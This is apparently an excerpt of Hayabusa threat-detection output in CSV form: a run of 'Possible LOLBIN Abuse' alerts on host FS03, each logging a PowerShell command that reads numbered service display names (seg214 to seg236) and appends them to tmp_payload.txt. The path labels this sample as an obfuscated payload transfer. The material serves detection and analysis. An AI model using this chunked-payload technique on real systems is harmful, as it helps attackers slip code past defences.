2021-11-03 17:39:38.788 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xde0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:40.232 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:40.232 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x940 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:41.673 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:41.673 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xfe4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:43.146 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:43.146 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xef4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:44.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x298 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:44.599 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:46.053 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:46.053 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:47.505 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x308 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:47.505 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:48.943 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:48.959 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:50.402 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:50.402 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:51.840 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:51.855 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:53.299 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:53.299 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:54.755 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:54.755 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:56.197 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:56.213 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:57.679 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:57.679 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:59.127 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:39:59.127 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:00.581 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:00.581 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:02.034 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:02.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:03.487 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:03.503 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:04.941 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:04.941 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:06.381 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:06.381 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:07.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:07.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:09.316 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:09.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:10.768 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:40:10.768 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
